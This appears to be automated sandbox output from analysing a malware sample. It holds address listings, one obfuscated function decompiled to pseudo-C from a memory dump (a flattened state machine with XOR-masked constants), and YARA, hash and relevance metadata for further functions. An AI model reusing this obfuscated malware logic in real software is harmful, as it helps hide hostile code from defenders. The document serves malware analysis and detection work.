                          0x00000000
                          0x0110bbc6
                          0x0110b998
                          0x0110b9ab
                          0x0110b9ac
                          0x0110b9b2
                          0x0110b9b7
                          0x0110b9bb
                          0x0110b9bd
                          0x0110b9c7
                          0x0110b9cc
                          0x0110b952
                          0x0110b952
                          0x0110b952
                          0x0110b956
                          0x0110b956
                          0x0110b956
                          0x0110b95c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0110b95c
                          0x00000000
                          0x0110b956
                          0x0110b952
                          0x0110b992
                          0x0110b97e
                          0x0110b976
                          0x0110b96a
                          0x0110bbe8
                          0x0110bbe8
                          0x0110baf0
                          0x0110baf6
                          0x0110bb93
                          0x0110bb98
                          0x0110bb9b
                          0x0110bba4
                          0x0110bbb0
                          0x00000000
                          0x0110bba6
                          0x0110bba6
                          0x00000000
                          0x0110bba6
                          0x0110bafc
                          0x0110bb02
                          0x0110bb5f
                          0x0110bb60
                          0x0110bb66
                          0x0110bb6b
                          0x0110bb6d
                          0x0110bb72
                          0x0110bb74
                          0x00000000
                          0x0110bb74
                          0x0110bb04
                          0x0110bb0a
                          0x0110bb38
                          0x0110bb42
                          0x0110bb48
                          0x00000000
                          0x0110bb0c
                          0x0110bb0c
                          0x0110bb13
                          0x00000000
                          0x0110bb19
                          0x0110bb2e
                          0x0110bb33
                          0x00000000
                          0x0110bb33
                          0x0110bb13
                          0x0110bb0a
                          0x0110bb02
                          0x00000000
                          0x0110baf6
                          0x0110b956

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &WV+$4H:r$@?M$MF$NG$|Y$'uh
                          • API String ID: 0-4100433312
                          • Opcode ID: 38e5f9a793c0e5397a6bc99214c1423183a92482fa00dd030636ba4dfd883c73
                          • Instruction ID: e399195d8012e7c13cffad6647a5c1a508dc5ce2d3a6973157ca382184d61c65
                          • Opcode Fuzzy Hash: 38e5f9a793c0e5397a6bc99214c1423183a92482fa00dd030636ba4dfd883c73
                          • Instruction Fuzzy Hash: 030245769083808FD768CF65C94AA5BFBE1FBC4708F008A1DE6D996260D7B48909CF47
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 011189A2, Relevance: 9.1, Strings: 7, Instructions: 336COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 92%
                          			E011189A2(void* __ecx, void* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v260;
				char _v268;
				intOrPtr _v272;
				char _v276;
				intOrPtr _v280;
				char _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _t291;
				void* _t306;
				intOrPtr _t310;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t333;
				intOrPtr _t334;
				void* _t337;
				intOrPtr _t339;
				intOrPtr _t365;
				void* _t379;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				void* _t384;
				void* _t385;
				signed int* _t387;
				void* _t389;
				void* _t395;

				_t395 = __fp0;
				_push(_a24);
				_t385 = __ecx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0110358A(_t291);
				_v368 = 0x969fa1;
				_t387 =  &(( &_v404)[8]);
				_v368 = _v368 ^ 0x3dce833c;
				_t334 = 0;
				_t337 = 0x82450b3;
				_t380 = 0x39;
				_v368 = _v368 * 0x56;
				_v368 = _v368 ^ 0x9b96e7de;
				_v384 = 0x522009;
				_v384 = _v384 | 0xefa7af6e;
				_v384 = _v384 + 0x84bf;
				_v384 = _v384 << 0xc;
				_v384 = _v384 ^ 0x83454f1d;
				_v376 = 0xbc1b17;
				_v376 = _v376 * 0x6b;
				_v376 = _v376 >> 8;
				_v376 = _v376 ^ 0x00409983;
				_v340 = 0xeafe9b;
				_v340 = _v340 | 0x1be7931a;
				_v340 = _v340 / _t380;
				_v340 = _v340 ^ 0x007842c4;
				_v292 = 0xb0530f;
				_v292 = _v292 << 0xa;
				_v292 = _v292 ^ 0xc14db39e;
				_v288 = 0x51afd8;
				_v288 = _v288 + 0xffff1444;
				_v288 = _v288 ^ 0x0053892b;
				_v300 = 0x659e5;
				_v300 = _v300 + 0xffffd736;
				_v300 = _v300 ^ 0x00069f22;
				_v320 = 0x400a9d;
				_v320 = _v320 + 0xbe72;
				_v320 = _v320 + 0xffffedb0;
				_v320 = _v320 ^ 0x00466b5a;
				_v352 = 0xd7c1d3;
				_v352 = _v352 | 0x43544fa1;
				_v352 = _v352 + 0xf105;
				_v352 = _v352 ^ 0x43de8af9;
				_v328 = 0x7c4df2;
				_v328 = _v328 + 0xffff5764;
				_v328 = _v328 + 0x5d13;
				_v328 = _v328 ^ 0x0078d700;
				_v308 = 0x886a66;
				_v308 = _v308 + 0xffffb9a9;
				_v308 = _v308 ^ 0x0083c87a;
				_v344 = 0x372a1f;
				_v344 = _v344 >> 0xe;
				_v344 = _v344 + 0xffff2200;
				_v344 = _v344 ^ 0xfffac0df;
				_v296 = 0xe8ac11;
				_v296 = _v296 * 0x24;
				_v296 = _v296 ^ 0x20bd2906;
				_v304 = 0xc63cda;
				_v304 = _v304 * 0x18;
				_v304 = _v304 ^ 0x1295b197;
				_v332 = 0xe4d16;
				_v332 = _v332 + 0x4e9b;
				_v332 = _v332 >> 0xd;
				_v332 = _v332 ^ 0x0005dbab;
				_v372 = 0x45ead6;
				_v372 = _v372 + 0xffffe00c;
				_v372 = _v372 | 0x2bf1f08a;
				_v372 = _v372 ^ 0x2bf477f7;
				_v360 = 0x221565;
				_v360 = _v360 >> 2;
				_v360 = _v360 + 0xffffd8ea;
				_v360 = _v360 ^ 0x0006f076;
				_v312 = 0x4ed877;
				_v312 = _v312 << 1;
				_v312 = _v312 ^ 0x00935492;
				_v404 = 0x8469bf;
				_v404 = _v404 ^ 0x075bbf41;
				_v404 = _v404 | 0x28bf3f30;
				_t381 = 0x7e;
				_push("true");
				_v404 = _v404 * 0x49;
				_v404 = _v404 ^ 0xaff6c928;
				_v396 = 0x1bbe4c;
				_v396 = _v396 / _t381;
				_v396 = _v396 + 0xffffcd97;
				_pop(_t382);
				_v396 = _v396 * 0x38;
				_v396 = _v396 ^ 0x0009bf96;
				_v316 = 0x795385;
				_v316 = _v316 | 0x4718ac15;
				_v316 = _v316 >> 9;
				_v316 = _v316 ^ 0x0025e58d;
				_v324 = 0x70fc4d;
				_v324 = _v324 + 0x3f88;
				_v324 = _v324 + 0xcd5b;
				_v324 = _v324 ^ 0x007a737b;
				_v364 = 0xf2bf60;
				_v364 = _v364 * 0x7e;
				_v364 = _v364 / _t382;
				_v364 = _v364 ^ 0x01c559c7;
				_v336 = 0xcb080e;
				_v336 = _v336 << 0xe;
				_v336 = _v336 ^ 0xc2002858;
				_v380 = 0x5b6f54;
				_v380 = _v380 | 0x2762fee8;
				_v380 = _v380 + 0xffff4494;
				_v380 = _v380 ^ 0x277b3211;
				_v400 = 0xb8b9c5;
				_v400 = _v400 + 0xb5f;
				_v400 = _v400 << 1;
				_v400 = _v400 << 0xd;
				_v400 = _v400 ^ 0x3147c5ea;
				_v356 = 0xab28bc;
				_v356 = _v356 ^ 0x8927fd9f;
				_v356 = _v356 | 0x2a302ed7;
				_v356 = _v356 ^ 0xabba2c68;
				_v392 = 0x4b8eaf;
				_v392 = _v392 << 9;
				_v392 = _v392 >> 6;
				_v392 = _v392 << 8;
				_v392 = _v392 ^ 0x5c793020;
				_v348 = 0xf3aa03;
				_v348 = _v348 + 0xffff1528;
				_v348 = _v348 ^ 0x7304fcf0;
				_v348 = _v348 ^ 0x73fb1ffb;
				_v388 = 0x3dd2bd;
				_v388 = _v388 | 0x311b3931;
				_v388 = _v388 + 0x59a2;
				_v388 = _v388 + 0x7e2f;
				_v388 = _v388 ^ 0x3140d78e;
				while(1) {
					L1:
					_t306 = 0xbbb7183;
					do {
						while(1) {
							L2:
							_t389 = _t337 - 0x80cc2ab;
							if(_t389 > 0) {
								break;
							}
							if(_t389 == 0) {
								_t321 = E01114CF5( &_v268, _v404, _v396, _v316, _a24);
								_t387 =  &(_t387[3]);
								if(_t321 != 0) {
									_t379 = 0xf971f34;
									_t334 = 1;
								}
								_t337 = 0x2e35f5d;
								while(1) {
									L1:
									_t306 = 0xbbb7183;
									goto L2;
								}
							} else {
								if(_t337 == 0xad90c7) {
									_t323 = E011084F0(_v292, _v288, _a16, _t385, _v300,  &_v284);
									_t387 =  &(_t387[4]);
									if(_t323 != 0) {
										_t337 = 0xf8f92a;
										while(1) {
											L1:
											_t306 = 0xbbb7183;
											goto L2;
										}
									}
								} else {
									if(_t337 == 0xf8f92a) {
										if(_v280 >= _v388) {
											_t325 = E01111591( &_v284,  &_v276);
										} else {
											_t325 = E0110A3E7( &_v284);
										}
										_t384 = _t325;
										_t306 = 0xbbb7183;
										_t337 =  !=  ? 0xbbb7183 : 0xb88ce56;
										continue;
									} else {
										if(_t337 == 0x2e35f5d) {
											_t241 =  &_v324; // 0x466b5a
											E0110AE43(_v268,  *_t241, _v364);
											goto L11;
										} else {
											if(_t337 != 0x5f87054) {
												goto L35;
											} else {
												_t333 = E01120370( &_v276, _v296, _t395, _v304, _v332,  *( *((intOrPtr*)( *0x1125208 + 0x30)) + 0x40) & 0x0000ffff,  *( *((intOrPtr*)( *0x1125208 + 0x30)) + 0x24) & 0x0000ffff, _v372,  &_v268,  &_v260, _t384, _v360,  *((intOrPtr*)( *0x1125208 + 0x30)), _v312);
												_t387 =  &(_t387[0xb]);
												if(_t333 == 0) {
													_t379 = 0x9c17656;
													L11:
													_t337 = 0xb88ce56;
													while(1) {
														L1:
														_t306 = 0xbbb7183;
														goto L2;
													}
												} else {
													_t337 = 0x80cc2ab;
													while(1) {
														L1:
														_t306 = 0xbbb7183;
														goto L2;
													}
												}
											}
										}
									}
								}
							}
							L38:
							return _t334;
						}
						if(_t337 == 0x82450b3) {
							_t384 = 0;
							E0111365D(_v368,  &_v260, _v384, 0x100, _v376, _v340);
							_t387 =  &(_t387[4]);
							_t337 = 0xad90c7;
							_v276 = 0;
							_v272 = 0;
							_v284 = 0;
							_v280 = 0;
							goto L34;
						} else {
							if(_t337 == 0x9c17656) {
								_t339 =  *0x1125208;
								_t310 =  *((intOrPtr*)( *((intOrPtr*)(_t339 + 0x30)) + 0x20));
								 *((intOrPtr*)(_t339 + 0x2c)) =  *((intOrPtr*)(_t339 + 0x2c)) + 1;
								_t365 =  *((intOrPtr*)(_t339 + 0x2c));
								 *((intOrPtr*)(_t339 + 0x30)) = _t310;
								if(_t310 == 0) {
									 *((intOrPtr*)(_t339 + 0x30)) =  *((intOrPtr*)(_t339 + 0x24));
								}
								if(_t365 >=  *((intOrPtr*)( *0x1125208 + 0x10))) {
									 *( *0x1125208 + 0x2c) =  *( *0x1125208 + 0x2c) & 0x00000000;
								} else {
									_t337 = 0x82450b3;
									goto L1;
								}
							} else {
								if(_t337 == 0xb88ce56) {
									E0110AE43(_v284, _v336, _v380);
									E0110AE43(_t384, _v400, _v356);
									E0110AE43(_v276, _v392, _v348);
									_t337 = _t379;
									L34:
									_t306 = 0xbbb7183;
									goto L35;
								} else {
									if(_t337 != _t306) {
										goto L35;
									} else {
										_push(_t337);
										_t319 = E01102C02(1, 0x40);
										_push(_v344);
										_push( &_v260);
										_push(0xb);
										_push(_v308);
										E01104A97(_t319, _v328);
										_t387 =  &(_t387[6]);
										_t337 = 0x5f87054;
										while(1) {
											L1:
											_t306 = 0xbbb7183;
											goto L2;
										}
									}
								}
							}
						}
						goto L38;
						L35:
					} while (_t337 != 0xf971f34);
					goto L38;
				}
			}




























































                          0x011189a2
                          0x011189ac
                          0x011189b3
                          0x011189b5
                          0x011189bc
                          0x011189c3
                          0x011189ca
                          0x011189d1
                          0x011189d8
                          0x011189d9
                          0x011189da
                          0x011189df
                          0x011189e7
                          0x011189ea
                          0x011189f9
                          0x011189fb
                          0x01118a02
                          0x01118a03
                          0x01118a07
                          0x01118a0f
                          0x01118a17
                          0x01118a1f
                          0x01118a27
                          0x01118a2c
                          0x01118a34
                          0x01118a41
                          0x01118a45
                          0x01118a4a
                          0x01118a52
                          0x01118a5a
                          0x01118a68
                          0x01118a6c
                          0x01118a74
                          0x01118a7f
                          0x01118a87
                          0x01118a92
                          0x01118a9d
                          0x01118aa8
                          0x01118ab3
                          0x01118abb
                          0x01118ac3
                          0x01118acb
                          0x01118ad3
                          0x01118adb
                          0x01118ae3
                          0x01118aeb
                          0x01118af3
                          0x01118afb
                          0x01118b03
                          0x01118b0b
                          0x01118b13
                          0x01118b1b
                          0x01118b23
                          0x01118b2b
                          0x01118b33
                          0x01118b3b
                          0x01118b43
                          0x01118b4b
                          0x01118b50
                          0x01118b58
                          0x01118b60
                          0x01118b6d
                          0x01118b71
                          0x01118b79
                          0x01118b86
                          0x01118b8a
                          0x01118b92
                          0x01118b9a
                          0x01118ba2
                          0x01118ba7
                          0x01118baf
                          0x01118bb9
                          0x01118bc1
                          0x01118bc9
                          0x01118bd1
                          0x01118bd9
                          0x01118bde
                          0x01118be6
                          0x01118bee
                          0x01118bf6
                          0x01118bfa
                          0x01118c02
                          0x01118c0a
                          0x01118c12
                          0x01118c21
                          0x01118c22
                          0x01118c24
                          0x01118c28
                          0x01118c30
                          0x01118c40
                          0x01118c44
                          0x01118c51
                          0x01118c52
                          0x01118c56
                          0x01118c5e
                          0x01118c66
                          0x01118c6e
                          0x01118c73
                          0x01118c7b
                          0x01118c83
                          0x01118c8b
                          0x01118c93
                          0x01118c9b
                          0x01118ca8
                          0x01118cb2
                          0x01118cb6
                          0x01118cbe
                          0x01118cc6
                          0x01118ccb
                          0x01118cd3
                          0x01118cdb
                          0x01118ce3
                          0x01118ceb
                          0x01118cf3
                          0x01118cfb
                          0x01118d03
                          0x01118d07
                          0x01118d0c
                          0x01118d14
                          0x01118d1c
                          0x01118d24
                          0x01118d2c
                          0x01118d34
                          0x01118d3c
                          0x01118d41
                          0x01118d46
                          0x01118d4b
                          0x01118d5b
                          0x01118d63
                          0x01118d6b
                          0x01118d73
                          0x01118d7b
                          0x01118d83
                          0x01118d8b
                          0x01118d93
                          0x01118d9b
                          0x01118da3
                          0x01118da3
                          0x01118da3
                          0x01118da8
                          0x01118da8
                          0x01118da8
                          0x01118da8
                          0x01118dae
                          0x00000000
                          0x00000000
                          0x01118db4
                          0x01118f09
                          0x01118f0e
                          0x01118f13
                          0x01118f17
                          0x01118f1c
                          0x01118f1c
                          0x01118f24
                          0x01118da3
                          0x01118da3
                          0x01118da3
                          0x00000000
                          0x01118da3
                          0x01118dba
                          0x01118dc0
                          0x01118ed5
                          0x01118eda
                          0x01118edf
                          0x01118ee5
                          0x01118da3
                          0x01118da3
                          0x01118da3
                          0x00000000
                          0x01118da3
                          0x01118da3
                          0x01118dc6
                          0x01118dcc
                          0x01118e88
                          0x01118e98
                          0x01118e8a
                          0x01118e8a
                          0x01118e8a
                          0x01118e9d
                          0x01118ea6
                          0x01118eab
                          0x00000000
                          0x01118dd2
                          0x01118dd8
                          0x01118e63
                          0x01118e6e
                          0x00000000
                          0x01118dde
                          0x01118de4
                          0x00000000
                          0x01118dea
                          0x01118e3a
                          0x01118e3f
                          0x01118e44
                          0x01118e50
                          0x01118e55
                          0x01118e55
                          0x01118da3
                          0x01118da3
                          0x01118da3
                          0x00000000
                          0x01118da3
                          0x01118e46
                          0x01118e46
                          0x01118da3
                          0x01118da3
                          0x01118da3
                          0x00000000
                          0x01118da3
                          0x01118da3
                          0x01118e44
                          0x01118de4
                          0x01118dd8
                          0x01118dcc
                          0x01118dc0
                          0x01119070
                          0x01119079
                          0x01119079
                          0x01118f34
                          0x01119012
                          0x01119025
                          0x0111902a
                          0x0111902d
                          0x01119034
                          0x0111903b
                          0x01119042
                          0x01119049
                          0x00000000
                          0x01118f3a
                          0x01118f40
                          0x01118fd4
                          0x01118fdd
                          0x01118fe0
                          0x01118fe3
                          0x01118fe6
                          0x01118feb
                          0x01118ff0
                          0x01118ff0
                          0x01118ffb
                          0x01119069
                          0x01118ffd
                          0x01118ffd
                          0x00000000
                          0x01118ffd
                          0x01118f46
                          0x01118f4c
                          0x01118fa5
                          0x01118fb5
                          0x01118fca
                          0x01118fd0
                          0x01119050
                          0x01119050
                          0x00000000
                          0x01118f4e
                          0x01118f50
                          0x00000000
                          0x01118f56
                          0x01118f61
                          0x01118f64
                          0x01118f69
                          0x01118f74
                          0x01118f75
                          0x01118f77
                          0x01118f84
                          0x01118f89
                          0x01118f8c
                          0x01118da3
                          0x01118da3
                          0x01118da3
                          0x00000000
                          0x01118da3
                          0x01118da3
                          0x01118f50
                          0x01118f4c
                          0x01118f40
                          0x00000000
                          0x01119055
                          0x01119055
                          0x00000000
                          0x01119061

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: R$ 0y\$/~$To[$X($ZkF{sz${sz
                          • API String ID: 0-4201736015
                          • Opcode ID: 47376b01066a891eb1f9502876b2c1a3ca06dfae0b30d3c4b33baeebcea4f3b8
                          • Instruction ID: 7a4cffc274f3ae78db6842bb49fb2b8fcc83fb9119565cf983218207706ce209
                          • Opcode Fuzzy Hash: 47376b01066a891eb1f9502876b2c1a3ca06dfae0b30d3c4b33baeebcea4f3b8
                          • Instruction Fuzzy Hash: C8F14271508381DFD368CF25C585A5BFBE2FBD4748F10892DE6AA86260E7B58909CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01109824, Relevance: 9.0, Strings: 7, Instructions: 297COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 3**$#S$$]$Sa+0$cf$|$~
                          • API String ID: 0-2081237789
                          • Opcode ID: 94f08bdd749946dc9e280da820ccdc6b5310f9b4d47f2216daa6702f95887990
                          • Instruction ID: e96547cc434dfe0ef047453436b68adb322d2433356110ca70780d3a05e39c38
                          • Opcode Fuzzy Hash: 94f08bdd749946dc9e280da820ccdc6b5310f9b4d47f2216daa6702f95887990
                          • Instruction Fuzzy Hash: 6BF101B15093809FD3A8CF65C589A0BFBF1FBD5708F10891CF2A986261D7B58949CF46
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01113043, Relevance: 9.0, Strings: 7, Instructions: 281COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 3Tp$E$Ie#$Xk4$oB$0($v48
                          • API String ID: 0-724312824
                          • Opcode ID: b694b059c94617af22954fee9eda2e067a85333d39a5c1605e2449476c9c7ef8
                          • Instruction ID: 18a910f04b75b4485d614f2a8101b473777b01439cbc02bb40c2bde66a69d744
                          • Opcode Fuzzy Hash: b694b059c94617af22954fee9eda2e067a85333d39a5c1605e2449476c9c7ef8
                          • Instruction Fuzzy Hash: D2E120711183819FD369CF25D48995BFBE1FBC4748F108A2DF2A68A264C7B19909CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 011110CD, Relevance: 9.0, Strings: 7, Instructions: 246COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 7$HL$NN$e .$fd$kH1$/]
                          • API String ID: 0-3661360838
                          • Opcode ID: 3636aaae36a00d05e205e09c4d1f9e02780aa723794707c96e5bc513f4b2f571
                          • Instruction ID: b0733a331c4b1bee8ddb59494d170c00e4eacea4447c17dab15cde200a2565da
                          • Opcode Fuzzy Hash: 3636aaae36a00d05e205e09c4d1f9e02780aa723794707c96e5bc513f4b2f571
                          • Instruction Fuzzy Hash: 68C13171508381ABC3A8CF29C58A41BFBF1FBC5758F108A2DF29296264C7B58949CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0110F73B, Relevance: 8.9, Strings: 7, Instructions: 181COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: .I%$9t$;$HB$j8N$j8N$8(
                          • API String ID: 0-1563950138
                          • Opcode ID: eed46a754fb776520618f95429eee3ef4e610ed8cb648f7398c3b82b0021f62e
                          • Instruction ID: 36f951451e487e20508f0320323c6b965d5e50ecc57ba6fa37b3a6ed657c470f
                          • Opcode Fuzzy Hash: eed46a754fb776520618f95429eee3ef4e610ed8cb648f7398c3b82b0021f62e
                          • Instruction Fuzzy Hash: 7A8167725093429BC729CF24C58A85FBBE0FBD4B48F004A5DF696562A0D3B1CA49CF87
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01116540, Relevance: 8.1, Strings: 6, Instructions: 602COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 5JI$;$iX8$j!$xf)$|
                          • API String ID: 0-167986053
                          • Opcode ID: b7a52d6c8cd856885ca753d2d2be89d06db41adc1590d52352b9c53d6088cab4
                          • Instruction ID: 41857bef8fb6a9e0dfb6472f13cc9f82307f13aef3b85650e6c1ad819810e6b9
                          • Opcode Fuzzy Hash: b7a52d6c8cd856885ca753d2d2be89d06db41adc1590d52352b9c53d6088cab4
                          • Instruction Fuzzy Hash: 6472FC715083819FD3B9CF25C54AB8BBBE1BBC5708F00891DE2DA962A0D7B19949CF53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0110C0EA, Relevance: 7.9, Strings: 6, Instructions: 377COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: (=2$6?$Lf$SYt$WH$j}
                          • API String ID: 0-1853663992
                          • Opcode ID: 91367e900b4236b9a5bf968be8e3143b865b4c4646ac3f9846de39ae06b9f5f0
                          • Instruction ID: 313993c00b0dc13b92e2b78e8bba0dfe73963025b6ea366a02d9cdb1a9d1f711
                          • Opcode Fuzzy Hash: 91367e900b4236b9a5bf968be8e3143b865b4c4646ac3f9846de39ae06b9f5f0
                          • Instruction Fuzzy Hash: 1522007150C3819FD7A9CF64C589A8BFBE2BBC5348F108A1DE2D986260D7B18949CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01103A6C, Relevance: 7.8, Strings: 6, Instructions: 276COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $?dg$D$Y"1$[$[D
                          • API String ID: 0-1233106220
                          • Opcode ID: 0fc8d187f0c84d0c7945c50cd43b35d32034a5d5d6d95f3b5b6ca0443084d587
                          • Instruction ID: 2a16974b58c43d8861baed8bf056a4ffd7abf23019e1c035a6a2a37622cd587f
                          • Opcode Fuzzy Hash: 0fc8d187f0c84d0c7945c50cd43b35d32034a5d5d6d95f3b5b6ca0443084d587
                          • Instruction Fuzzy Hash: AAD10E715083809FD369CF25C48AA5FFBE1BBD4358F108A1DF2AA96260D7B58949CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 011019C0, Relevance: 7.8, Strings: 6, Instructions: 254COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: (,$E/c$Fv$HRa$V@"$}95
                          • API String ID: 0-2341880589
                          • Opcode ID: cb8a5911e6f45387ad023420d8fbc12c2882f0c692a78a1138a2039abfeea477
                          • Instruction ID: 1cb347c890921649eb282517f6a9d715565142ed4f570898357bd7197438c3a9
                          • Opcode Fuzzy Hash: cb8a5911e6f45387ad023420d8fbc12c2882f0c692a78a1138a2039abfeea477
                          • Instruction Fuzzy Hash: 9ED110724083819FC368CF64C489A0FFBF2FBD5398F104A1DF695962A0D7B58949CB46
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 011092C1, Relevance: 7.7, Strings: 6, Instructions: 227COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 4$:9$V<5$jML$xDv$}n
                          • API String ID: 0-3443733993
                          • Opcode ID: c50ae2c9252c18616f655429af0094b0005fec3a6103dfb496a263c18c3309ca
                          • Instruction ID: 4e8862282f7677b6c917334bc9e578b8c53608751cfb3103363a802d604c3e07
                          • Opcode Fuzzy Hash: c50ae2c9252c18616f655429af0094b0005fec3a6103dfb496a263c18c3309ca
                          • Instruction Fuzzy Hash: BAA155715083419FC758CF26D88944BBFE2FBC4768F508A1DF2964A2A0D7B5C94ACF86
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0110B191, Relevance: 7.6, Strings: 6, Instructions: 121COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #$,9I$-Q$Ac.$J_}%$w^p
                          • API String ID: 0-1558224833
                          • Opcode ID: ae61706fdeaad13f98c270c67552bff527f1ee9d6b8a9257d130d760c6c3341a
                          • Instruction ID: 1d26cca35cca4c8e6ebe889acaad1e737764cca94a6cba4d0a28438d22f94aef
                          • Opcode Fuzzy Hash: ae61706fdeaad13f98c270c67552bff527f1ee9d6b8a9257d130d760c6c3341a
                          • Instruction Fuzzy Hash: 5E5175B290D3018FC799CE25D98941BBBE1FBD8718F104A1DF98566260C7B58A098F87
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0111009A, Relevance: 6.6, Strings: 5, Instructions: 367COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &<i"$R$U $g_$s<`
                          • API String ID: 0-3547921069
                          • Opcode ID: b626537bbfc610404ab401507a6590ed60fee4aeaa39bb88d388617354cd96cf
                          • Instruction ID: 39cd4b27e3771be54557ac7d34e0c05bcfac08112390864839fbef7ac07f93b3
                          • Opcode Fuzzy Hash: b626537bbfc610404ab401507a6590ed60fee4aeaa39bb88d388617354cd96cf
                          • Instruction Fuzzy Hash: CB0254715083819FD3A8CF25C989A4BFBE1BBC4758F00891DF2DA9A260D7B49949CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0111CE90, Relevance: 6.5, Strings: 5, Instructions: 292COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ,OT $H+$H+$WQ^$nK
                          • API String ID: 0-4252230371
                          • Opcode ID: 6c990f05891b430cb1681f11d9b1af9f98c8a299e6c51e1d340a11fbdfd8d71b
                          • Instruction ID: 26c46c5f40e64c0c3337b21601368259866b36d6494f7e091c27cd6205e5bb52
                          • Opcode Fuzzy Hash: 6c990f05891b430cb1681f11d9b1af9f98c8a299e6c51e1d340a11fbdfd8d71b
                          • Instruction Fuzzy Hash: 19F111715083819FD3A8CF65C58AA4BFBF2BBC5708F50891DE2DA96260D7B58909CF07
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0110A3E7, Relevance: 6.5, Strings: 5, Instructions: 257COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: =jk$Etp$Xm;$\$k^
                          • API String ID: 0-1272230326
                          • Opcode ID: fe5b831f3ec2751535c25862d0014297058b61c413c6a4907583b7611269e851
                          • Instruction ID: 59b2ecfd73eb83a00c7ca53a9a9bac0fbb59e407cf30c58cf89db7930b4870b8
                          • Opcode Fuzzy Hash: fe5b831f3ec2751535c25862d0014297058b61c413c6a4907583b7611269e851
                          • Instruction Fuzzy Hash: 35C142719083809FD358CF69D48990BFBE1FBC4358F108A2EF5A696260D3B5C94A8F42
                          Uniqueness

                          Uniqueness Score: -1.00%

